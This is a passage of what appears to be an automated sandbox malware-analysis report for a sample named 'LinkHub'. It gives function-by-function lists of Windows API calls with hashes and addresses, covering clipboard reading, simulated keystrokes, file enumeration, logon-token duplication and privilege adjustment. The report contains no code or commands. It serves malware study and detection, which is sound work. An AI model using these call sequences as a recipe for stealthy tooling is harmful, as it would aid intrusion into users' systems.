                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e3e0d276e1f9ab6324957b6360d365c752c1a2db61250121534d6f4f53298cdd
                                                                    • Instruction ID: 5c8be5efd4483df3f00584dbc3b73cbae8ec97febc421d857e762f4c36286142
                                                                    • Opcode Fuzzy Hash: e3e0d276e1f9ab6324957b6360d365c752c1a2db61250121534d6f4f53298cdd
                                                                    • Instruction Fuzzy Hash: 6051E435A00608AFDF10DF68C848BA97BA1EF85364F19816CE818DB391D731EE43CB90
                                                                    APIs
                                                                      • Part of subcall function 00C7663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C7668B,?,?,00C762FA,?,00000001,?,?,00000000), ref: 00C7664A
                                                                      • Part of subcall function 00C7663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C7665C
                                                                      • Part of subcall function 00C7663E: FreeLibrary.KERNEL32(00000000,?,?,00C7668B,?,?,00C762FA,?,00000001,?,?,00000000), ref: 00C7666E
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00C762FA,?,00000001,?,?,00000000), ref: 00C766AB
                                                                      • Part of subcall function 00C76607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00CB5657,?,?,00C762FA,?,00000001,?,?,00000000), ref: 00C76610
                                                                      • Part of subcall function 00C76607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C76622
                                                                      • Part of subcall function 00C76607: FreeLibrary.KERNEL32(00000000,?,?,00CB5657,?,?,00C762FA,?,00000001,?,?,00000000), ref: 00C76635
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                     • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressFreeProc
                                                                    • String ID:
                                                                    • API String ID: 2632591731-0
                                                                    • Opcode ID: 9d2380a0b86c768eff2c66bbe9e32dd359b1e8ddd9a8ca22d3fd4f8961ff5a8b
                                                                    • Instruction ID: 5f155648e90e3606c78caa30aaee4cb268006c6ba0c1f815a45624ea09b19bb1
                                                                    • Opcode Fuzzy Hash: 9d2380a0b86c768eff2c66bbe9e32dd359b1e8ddd9a8ca22d3fd4f8961ff5a8b
                                                                    • Instruction Fuzzy Hash: 0611E771600605ABCF14AB60C802BAD7BA5AF50711F50C42DF49AA71C2DE71DA05EB60
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                     • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: __wsopen_s
                                                                    • String ID:
                                                                    • API String ID: 3347428461-0
                                                                    • Opcode ID: fca2309ca1a2c8564de272a24658873f6a4e2c4b51134687dfbc32d4c3b70e07
                                                                    • Instruction ID: 374facc025efa5983612ace68876be6c6a3b4e5c66d24295dcd45977cab49b08
                                                                    • Opcode Fuzzy Hash: fca2309ca1a2c8564de272a24658873f6a4e2c4b51134687dfbc32d4c3b70e07
                                                                    • Instruction Fuzzy Hash: 5611487590420AAFCF05DF58E94099A7BF8EF49304F104069F808EB311DA31EA158B64
                                                                    APIs
                                                                      • Part of subcall function 00CA4FF0: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CA319C,00000001,00000364,?,00C90165,?,?,00CE11D9,0000FFFF), ref: 00CA5031
                                                                    • _free.LIBCMT ref: 00CA53DF
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                     • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free
                                                                    • String ID:
                                                                    • API String ID: 614378929-0
                                                                    • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                    • Instruction ID: 7118cff2d210788022cdc85e88aba5ee5822841847d4b34f804d4b2870e037ff
                                                                    • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                    • Instruction Fuzzy Hash: A60149B720030A6BE7318F69D88195AFBEDEFC6374F25091DE59483280EB70A905C774
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                     • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4624603760d48ad0bd9b94422b8c27d6f3f6d6689bf5384beaeb8052d0d19255
                                                                    • Instruction ID: 425c3bf77034ce867c3e967497370fd21f28247d66aa0d70df31708d0c2e8f89
                                                                    • Opcode Fuzzy Hash: 4624603760d48ad0bd9b94422b8c27d6f3f6d6689bf5384beaeb8052d0d19255
                                                                    • Instruction Fuzzy Hash: 69F0283250162057DE317A7B9C0DB9A33988F53338F110B26F826A71D1EB74E90296E2
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                     • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID:
                                                                    • API String ID: 176396367-0
                                                                    • Opcode ID: 24e1bed089a0a212f438498dc0cf42ee6fb7a4dd5cd8dbf57bfe1d03ae170818
                                                                    • Instruction ID: 2e86e4b5f35db67863a7c77237b4000e51bea250c0aa94969f2d47c7997520b5
                                                                    • Opcode Fuzzy Hash: 24e1bed089a0a212f438498dc0cf42ee6fb7a4dd5cd8dbf57bfe1d03ae170818
                                                                    • Instruction Fuzzy Hash: 5AF0CD735017057ED7149F29D806F66BB54EB44760F10812AFA1DCB1D1DB31E55097A0
                                                                    APIs
                                                                    • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00CEF987
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                     • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentVariable
                                                                    • String ID:
                                                                    • API String ID: 1431749950-0
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CA319C,00000001,00000364,?,00C90165,?,?,00CE11D9,0000FFFF), ref: 00CA5031
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00C90165,?,?,00CE11D9,0000FFFF), ref: 00CA3BC5
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: __fread_nolock
                                                                    • String ID:
                                                                    • API String ID: 2638373210-0
                                                                    APIs
                                                                    • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00C73963
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_
                                                                    • String ID:
                                                                    • API String ID: 1144537725-0
                                                                    APIs
                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C73A76
                                                                      • Part of subcall function 00C78577: _wcslen.LIBCMT ref: 00C7858A
                                                                    Similarity
                                                                    • API ID: LongNamePath_wcslen
                                                                    • String ID:
                                                                    • API String ID: 541455249-0
                                                                    APIs
                                                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00CDE857
                                                                      • Part of subcall function 00C78577: _wcslen.LIBCMT ref: 00C7858A
                                                                    Similarity
                                                                    • API ID: FolderPath_wcslen
                                                                    • String ID:
                                                                    • API String ID: 2987691875-0
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_000712D1,00000000,00000000,?), ref: 00CE1306
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,00000000,?,00CB0A84,?,?,00000000,?,00CB0A84,00000000,0000000C), ref: 00CB0737
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00C8FC86
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CCFCB8
                                                                    • IsIconic.USER32(00000000), ref: 00CCFCC1
                                                                    • ShowWindow.USER32(00000000,00000009), ref: 00CCFCCE
                                                                    • SetForegroundWindow.USER32(00000000), ref: 00CCFCD8
                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00CCFCEE
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00CCFCF5
                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00CCFD01
                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00CCFD12
                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00CCFD1A
                                                                    • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00CCFD22
                                                                    • SetForegroundWindow.USER32(00000000), ref: 00CCFD25
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CCFD3A
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00CCFD45
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CCFD4F
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00CCFD54
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CCFD5D
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00CCFD62
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CCFD6C
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00CCFD71
                                                                    • SetForegroundWindow.USER32(00000000), ref: 00CCFD74
                                                                    • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00CCFD9B
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 4125248594-2988720461
                                                                    APIs
                                                                      • Part of subcall function 00CD2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CD205A
                                                                      • Part of subcall function 00CD2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CD2087
                                                                      • Part of subcall function 00CD2010: GetLastError.KERNEL32 ref: 00CD2097
                                                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00CD1BD2
                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00CD1BF4
                                                                    • CloseHandle.KERNEL32(?), ref: 00CD1C05
                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00CD1C1D
                                                                    • GetProcessWindowStation.USER32 ref: 00CD1C36
                                                                    • SetProcessWindowStation.USER32(00000000), ref: 00CD1C40
                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00CD1C5C
                                                                      • Part of subcall function 00CD1A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00CD1B48), ref: 00CD1A20
                                                                      • Part of subcall function 00CD1A0B: CloseHandle.KERNEL32(?,?,00CD1B48), ref: 00CD1A35
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                    • String ID: $default$winsta0
                                                                    • API String ID: 22674027-1027155976
                                                                    • Opcode ID: 653a67da55684bcab17b63035178906e00a9702fb9456f0e0d72f84f8d21cab4
                                                                    • Instruction ID: e73d777498883558f8399cf61d69b058731660ff8766136554de9a28cd259977
                                                                    • Opcode Fuzzy Hash: 653a67da55684bcab17b63035178906e00a9702fb9456f0e0d72f84f8d21cab4
                                                                    • Instruction Fuzzy Hash: B4812971900209BFDF119FA4DC49FEE7BBAEF04704F18411AFA25A62A0D7718A55DB60
                                                                    APIs
                                                                      • Part of subcall function 00CD1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00CD1A60
                                                                      • Part of subcall function 00CD1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00CD14E7,?,?,?), ref: 00CD1A6C
                                                                      • Part of subcall function 00CD1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00CD14E7,?,?,?), ref: 00CD1A7B
                                                                      • Part of subcall function 00CD1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00CD14E7,?,?,?), ref: 00CD1A82
                                                                      • Part of subcall function 00CD1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00CD1A99
                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00CD1518
                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00CD154C
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00CD1563
                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00CD159D
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00CD15B9
                                                                    • GetLengthSid.ADVAPI32(?), ref: 00CD15D0
                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00CD15D8
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00CD15DF
                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00CD1600
                                                                    • CopySid.ADVAPI32(00000000), ref: 00CD1607
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00CD1636
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CD1658
                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00CD166A
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CD1691
                                                                    • HeapFree.KERNEL32(00000000), ref: 00CD1698
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CD16A1
                                                                    • HeapFree.KERNEL32(00000000), ref: 00CD16A8
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CD16B1
                                                                    • HeapFree.KERNEL32(00000000), ref: 00CD16B8
                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00CD16C4
                                                                    • HeapFree.KERNEL32(00000000), ref: 00CD16CB
                                                                      • Part of subcall function 00CD1ADF: GetProcessHeap.KERNEL32(00000008,00CD14FD,?,00000000,?,00CD14FD,?), ref: 00CD1AED
                                                                      • Part of subcall function 00CD1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00CD14FD,?), ref: 00CD1AF4
                                                                      • Part of subcall function 00CD1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00CD14FD,?), ref: 00CD1B03
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                    • String ID:
                                                                    • API String ID: 4175595110-0
                                                                    • Opcode ID: 8cb9ecc90f7057274e30d0ff938c746d4b31bd62d358c862ce2ae8623facb0ed
                                                                    • Instruction ID: 1bfc522bc24fab1ce485168521378690794e10e7c2c9f7beecf127daf04725cc
                                                                    • Opcode Fuzzy Hash: 8cb9ecc90f7057274e30d0ff938c746d4b31bd62d358c862ce2ae8623facb0ed
                                                                    • Instruction Fuzzy Hash: E8712CB1900209BBDF109FA5DC48FAEBBB9FF04350F184516FA29E6290D775DA06CB60
                                                                    APIs
                                                                    • OpenClipboard.USER32(00D0DCD0), ref: 00CEF586
                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00CEF594
                                                                    • GetClipboardData.USER32(0000000D), ref: 00CEF5A0
                                                                    • CloseClipboard.USER32 ref: 00CEF5AC
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00CEF5E4
                                                                    • CloseClipboard.USER32 ref: 00CEF5EE
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00CEF619
                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00CEF626
                                                                    • GetClipboardData.USER32(00000001), ref: 00CEF62E
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00CEF63F
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00CEF67F
                                                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 00CEF695
                                                                    • GetClipboardData.USER32(0000000F), ref: 00CEF6A1
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00CEF6B2
                                                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00CEF6D4
                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00CEF6F1
                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00CEF72F
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00CEF750
                                                                    • CountClipboardFormats.USER32 ref: 00CEF771
                                                                    • CloseClipboard.USER32 ref: 00CEF7B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                    • String ID:
                                                                    • API String ID: 420908878-0
                                                                    • Opcode ID: b4643fb039808a976282daab9c2a6850a81d6edb5f2befae4d9fa7463d55ef96
                                                                    • Instruction ID: cfc7704659f9df2bdad7206cae7045d634ea3f4be96b42baacb98265ef47ed50
                                                                    • Opcode Fuzzy Hash: b4643fb039808a976282daab9c2a6850a81d6edb5f2befae4d9fa7463d55ef96
                                                                    • Instruction Fuzzy Hash: 2761F2352043419FD300EF65D888F6ABBA5EF84704F54856EF45AC72A2CB31DE46DB62
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00CE7403
                                                                    • FindClose.KERNEL32(00000000), ref: 00CE7457
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CE7493
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CE74BA
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CE74F7
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CE7524
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                    • API String ID: 3830820486-3289030164
                                                                    • Opcode ID: 8454f559741e021dfbaa697462bf74f222c5eeded46e49141a057ae582e69825
                                                                    • Instruction ID: c2a2f07b848dff3b77f541c8234c6a178bab0880c47b03ee3c1a9a4fc5adf79d
                                                                    • Opcode Fuzzy Hash: 8454f559741e021dfbaa697462bf74f222c5eeded46e49141a057ae582e69825
                                                                    • Instruction Fuzzy Hash: 28D192B2508344AFC310EB64C885EAFB7ECAF98704F44491DF589D6291EB34DE48DB62
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00CEA0A8
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00CEA0E6
                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00CEA100
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00CEA118
                                                                    • FindClose.KERNEL32(00000000), ref: 00CEA123
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00CEA13F
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00CEA18F
                                                                    • SetCurrentDirectoryW.KERNEL32(00D37B94), ref: 00CEA1AD
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CEA1B7
                                                                    • FindClose.KERNEL32(00000000), ref: 00CEA1C4
                                                                    • FindClose.KERNEL32(00000000), ref: 00CEA1D4
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                    • String ID: *.*
                                                                    • API String ID: 1409584000-438819550
                                                                    • Opcode ID: 6d00816f99d8e5dfb96d8ffefbe82358061c3d1dbe76aa3eb0324f7ffe525cf9
                                                                    • Instruction ID: b3cc65210c152c32a6d28c9309d7c200a68b022efa920e8d4b940d5d1be54db2
                                                                    • Opcode Fuzzy Hash: 6d00816f99d8e5dfb96d8ffefbe82358061c3d1dbe76aa3eb0324f7ffe525cf9
                                                                    • Instruction Fuzzy Hash: C631E472600659AFDF24AFB6DC49BDE77AD9F05320F100156E829E2190EB70EE44CB75
                                                                    APIs
                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00CE4785
                                                                    • _wcslen.LIBCMT ref: 00CE47B2
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CE47E2
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00CE4803
                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00CE4813
                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00CE489A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00CE48A5
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00CE48B0
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                    • String ID: :$\$\??\%s
                                                                    • API String ID: 1149970189-3457252023
                                                                    • Opcode ID: 3cb10284c20e3bfeae3ac1725d2a07aa4814204747f177b69857d9b6fa0a96ef
                                                                    • Instruction ID: b49a1be05b37bb44730e6c5ef2fb55f366d96087d23a8b1a19cb7e066165fbcb
